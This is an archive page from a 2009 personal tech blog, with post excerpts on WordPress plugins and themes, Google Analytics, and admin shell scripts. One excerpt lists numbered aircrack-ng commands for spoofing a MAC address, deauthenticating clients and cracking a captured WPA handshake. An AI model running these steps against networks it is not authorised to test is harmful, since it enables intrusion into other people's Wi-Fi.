• Member Login

    Sign Up !

    Forgot Password ?




Log-in|Register
  • Buy iRedlof Ajax Login v4.0 [WP]

    Add to Cart Buy Now!

Monthly Archives: April 2009

How To Register & Setup Google Analytics On Your Website

Many of you have an online identity with blogs, personal website, etc. I guess all of you must be concerned about you website regarding google indexing, pagerank, pageviews, bounce rate, % of new visitors, visitors count, etc. But how do you track these events ? And are you interested in tracking them so that you

More...

Posted in WWW, Wordpress | Leave a comment

iRedlof Google Analytics Stats [WordPress Plugin] Updated v2.0

Current Version: 2.0 [Updated 10-May-09] Snapshots: iRedlof GA Stats Snapshot 1 iRedlof GA Stats Snapshot 2 iRedlof GA Stats Snapshot 3 Description: iRedlof Google Analytics(GA) Stats is a wordpess admin panel plugin, I developed it cos i like to manage everything from one place. This plugin is like wordpress .com stats plugin but the difference

More...

Posted in Wordpress | 39 Comments

Need Help With Your WordPress ?

Anybody out there having problem with your wordpress. For eg: problems like setting up your blog, plugin install, theme install, anything related to coding section, etc can ping me if you want any help from me. Add your question as comment below and i will try my level best to find a solution to your

More...

Posted in Wordpress | 25 Comments

iRedlof Link Checker [WordPress Plugin]

Being a Blogger, you always have to exchange links with other sites and very often have to purchase links from other pages also. In a long term link building process you have to build tens of thousands of links. Do you ever spend time to check whether all your old links which you purchased are

More...

Posted in Wordpress | 12 Comments

[Updated on 01-July-09]:iRedlof Inspire [WordPress Theme] v2.0

Description: An inspiring 2-Coloumn Black, Blue coloured theme tabbed for a revolutionary better browsing style with sidebar tabbed panel and iredlof ajax login plugin ready. Installation: Upload `iRedlofInspire` folder to the `/wp-content/themes/` directory. Upload `plugins` folder inside content (ajax-calendar, etc folders)to the `/wp-content/plugins/` directory Activate the plugin through the ”Plugins” menu in WordPress Activate the

More...

Posted in Wordpress | 11 Comments

Shell Script To Monitor UNIX / Linux Server Disk Space

Shell script to monitor or watch the disk space and send an email alert if the (free avilable) percentage of space is >= 90% #!/bin/sh # Shell script to monitor or watch the disk space # It will send an email to $ADMIN, if the (free avilable) percentage # of space is >= 90% #

More...

Posted in Ubuntu | Leave a comment

Crack WPA With BackTrack 3

How to crack Wifi – WPA with backtrack 3 : Steps : 1. airmon-ng stop wlan0 2. ifconfig wlan0 down 3. macchanger –mac 00:11:22:33:44:55 wlan0 4. airmon-ng start wlan0 5. airodump-ng wlan0 6. airodump-ng -c (channel) -w (file name) –bssid (bssid) wlan0 7. aireplay-ng -0 5 -a (bssid)wlan0 8. aircrack-ng (filename-01.cap)-w (dictionary location) 9. and

More...

Posted in Hacking & Cracking | 1 Comment

WP Error – “Error Establishing a Database Connection”

How To Fix “Error Establishing a Database Connection” WordPress Error Part 1 : How To Fix “Error Establishing a Database Connection” WordPress Error Part 2 : Courtesy: http://educhalk.org
Posted in Wordpress | Leave a comment

Shell script to check domain serial numbers across all name servers

#!/bin/bash # Linux shell script to check BIND named domain serial numbers across all name servers # Tested on RHEL, Fedora, Centos and Debian Linux # Requires named-checkzone, host utilities, and BIND server. # ----------------------------------------------------- # This script is licensed under GNU GPL version 2.0 or above # ----------------------------------------------------- # This script is part of

More...

Posted in Ubuntu | Leave a comment